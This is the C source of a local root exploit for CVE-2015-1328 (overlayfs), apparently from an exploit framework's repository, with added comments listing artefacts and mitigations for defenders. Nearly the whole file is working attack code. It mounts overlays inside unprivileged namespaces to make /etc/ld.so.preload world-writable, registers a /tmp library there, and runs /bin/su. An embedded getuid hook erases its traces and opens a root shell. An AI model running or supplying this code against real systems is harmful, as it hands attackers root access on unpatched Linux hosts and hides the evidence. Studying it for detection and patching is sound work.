Path: blob/master/external/source/exploits/CVE-2015-1328/1328.c
/*
 * Local proof of concept for CVE-2015-1328 (overlayfs, per the file path).
 * As publicly described for this CVE, overlayfs did not properly check
 * permissions when creating files in the upper directory, and the filesystem
 * could be mounted from inside an unprivileged user/mount namespace.
 *
 * What the visible code does, in order:
 *   1. forks, enters a new user namespace, then clones into a new mount
 *      namespace (child_exec);
 *   2. mounts an overlay, renames a file to "ld.so.preload" in it, remounts
 *      with upperdir=/etc and chmods that name to 0777;
 *   3. back in the original namespace, writes "/tmp/ofs-lib.so" into
 *      /etc/ld.so.preload and executes /bin/su.
 *
 * Review notes for defenders:
 *   - File artefacts: /tmp/ns_sploit/{work,upper,o}, /tmp/ofs-lib.c,
 *     /tmp/ofs-lib.so, and an /etc/ld.so.preload that is world-writable or
 *     names a library under /tmp.
 *   - The program and the LIB payload both delete their artefacts, so file
 *     presence alone is an unreliable indicator; audit records for
 *     unshare/clone/mount by unprivileged users and integrity monitoring of
 *     /etc/ld.so.preload are the more durable signals.
 *   - Mitigation is the vendor kernel update for this CVE; restricting
 *     unprivileged overlayfs mounts / user namespaces reduces exposure where
 *     the distribution offers such a control.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>

/*
 * C source, held as a string, for a shared object that interposes getuid().
 * Per the string: when the effective uid is 0 and /proc/self/exe reads as
 * /bin/su, it unlinks /etc/ld.so.preload and /tmp/ofs-lib.so, sets all
 * uids/gids to 0 and executes an interactive /bin/sh; otherwise it forwards
 * to the real getuid(). The self-removal is why the preload entry may be
 * gone by the time an investigator looks.
 */
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"

/* 1 MiB buffer handed to clone() in main() as the child's stack. */
static char child_stack[1024*1024];

/*
 * Entry point of the clone()d child; main() starts it with CLONE_NEWNS, so
 * the mounts below happen in a separate mount namespace.
 * The argument is unused.
 */
static int
child_exec(void *stuff)
{
    char *file;
    // Start from a clean scratch tree; all four directories are world-accessible.
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);

    // First mount: a kernel-owned directory as lowerdir, the scratch dir as
    // upperdir. Two filesystem type names are tried ("overlayfs", then
    // "overlay" with a workdir); the lowerdir and file name differ per variant.
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
        // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            // Both mounts refused: the error text attributes this to the
            // kernel not allowing overlayfs mounts from a user namespace.
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";

    // Rename the lower-layer file inside the merged view; presumably this
    // leaves an "ld.so.preload" entry in /tmp/ns_sploit/upper, which the
    // second mount uses as its lowerdir.
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");

    chdir("/");
    umount("/tmp/ns_sploit/o");
    // Second mount: the scratch dir becomes lowerdir and /etc becomes upperdir.
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }

    // chmod through the merged view with /etc as the upper layer. main()
    // afterwards opens /etc/ld.so.preload for writing, so a world-writable
    // /etc/ld.so.preload is the artefact to monitor for.
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}

/*
 * Driver: runs child_exec() inside new user and mount namespaces, then uses
 * the resulting /etc/ld.so.preload from the original namespace.
 * argc/argv are unused.
 */
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    // New mount namespace for the clone()d child; SIGCHLD on its exit.
    int clone_flags = CLONE_NEWNS | SIGCHLD;

    // The message says "threads", but the code below creates processes.
    fprintf(stderr,"spawning threads\n");

    if((wrapper = fork()) == 0) {
        // Unprivileged user-namespace creation: the first auditable step.
        // A failure is only logged; execution continues.
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");

        if((init = fork()) == 0) {
            // Stack pointer is the top of child_stack.
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }

            waitpid(pid, &status, 0);

        }

        waitpid(init, &status, 0);
        return 0;
    }

    // Parent (original namespaces): pause, then reap the wrapper child.
    usleep(300000);

    wait(NULL);

    fprintf(stderr,"child threads done\n");

    // Success test: the invoking user can open /etc/ld.so.preload for writing.
    fd = open("/etc/ld.so.preload",O_WRONLY);

    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }

    fprintf(stderr,"/etc/ld.so.preload created\n");
    // The block below is commented out in this copy, so this file neither
    // writes nor compiles the LIB source; the active code only references
    // /tmp/ofs-lib.so.
    /*
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
    fprintf(stderr,"couldn't create dynamic library\n");
    exit(-1);
    }*/
    // Register the /tmp library in the system-wide preload list (16 bytes,
    // including the newline).
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    // Scratch tree and generated source are removed before the final exec,
    // which limits what is left on disk for later inspection.
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    // Executing /bin/su is the last step; the LIB payload checks for exactly
    // this path before acting.
    execl("/bin/su","su",NULL);
}